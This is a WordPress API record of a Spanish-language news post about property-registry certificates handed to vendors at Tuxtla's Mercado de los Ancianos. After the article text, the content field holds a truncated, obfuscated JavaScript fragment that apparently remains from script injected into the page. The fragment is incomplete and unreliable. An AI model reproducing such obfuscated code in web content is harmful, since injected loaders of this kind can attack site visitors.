{"id":22798,"date":"2025-07-03T05:14:53","date_gmt":"2025-07-03T05:14:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22798"},"modified":"2025-07-03T05:14:54","modified_gmt":"2025-07-03T05:14:54","slug":"con-la-entrega-de-constancia-de-regularizacion-de-claves-catastrales-a-las-y-los-locatarios-tuxtlecos-se-brinda-certeza-juridica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22798","title":{"rendered":"Con la entrega de constancia de regularizaci\u00f3n de claves catastrales a las y los locatarios tuxtlecos se brinda certeza jur\u00eddica"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22802\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-1024x681.jpg\" alt=\"\" class=\"wp-image-22802\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000202224-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Desde el compromiso y visi\u00f3n humanista se responde a demanda a\u00f1eja de integrantes del Mercado de los Ancianos: Juan Carlos Moreno Guill\u00e9n.<\/li>\n<\/ul>\n\n\n\n<p>2 de julio del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar, en la Entrega de Constancia de Regularizaci\u00f3n de Claves Catastrales a las y los locatarios del \u201cMercado de los Ancianos\u201d, con lo que se les otorga certeza jur\u00eddica en su patrimonio comercial.<\/p>\n\n\n\n<p>En una convivencia emotiva y significativa, el gobernador Ram\u00edrez Aguilar entreg\u00f3 estas constancias que benefician a m\u00e1s de mil personas, al tiempo de enfatizar que este logro es resultado de una suma de esfuerzos con el magistrado presidente Juan Carlos Moreno Guill\u00e9n; el director de Catastro del Estado, Miguel \u00c1ngel Arg\u00fcello Aguilar, y el presidente de la Asociaci\u00f3n \u00danica del Mercado de los Ancianos A.C, Esteban de la Cruz.<\/p>\n\n\n\n<p>Por su parte, el titular del Tribunal Superior de Justicia, Moreno Guill\u00e9n, afirm\u00f3 que este acto responde y cumple a una demanda a\u00f1eja de las y los locatarios, y gracias al compromiso y la visi\u00f3n humanista de esta administraci\u00f3n, se logr\u00f3 habilitar las c\u00e9dulas catastrales en un tiempo r\u00e9cord, beneficiando no solo a integrantes del mercado sino a sus familias.<\/p>\n\n\n\n<p>Con estas acciones, se refrenda el compromiso del Poder Judicial con la legalidad, la justicia social y la certeza jur\u00eddica en los diferentes sectores sociales, con el fin de fortalecer la confianza institucional de la ciudadan\u00eda chiapaneca.<\/p>\n\n\n\n<p>En este acto estuvieron presentes el secretario del Humanismo, Francisco Chac\u00f3n S\u00e1nchez; el coordinador del Consejo del Mercado de los Ancianos, Jos\u00e9 Luis S\u00e1nchez; as\u00ed como las y los integrantes de la Asociaci\u00f3n \u00danica del Mercado de los Ancianos A.C.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Desde el compromiso y visi\u00f3n humanista se responde a demanda a\u00f1eja de integrantes del Mercado de los Ancianos: Juan Carlos Moreno Guill\u00e9n. 2 de julio del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar, en la Entrega de Constancia de Regularizaci\u00f3n de Claves &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22800,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22798","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22798","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22798"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22798\/revisions"}],"predecessor-version":[{"id":22805,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22798\/revisions\/22805"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22800"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22798"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22798"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22798"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}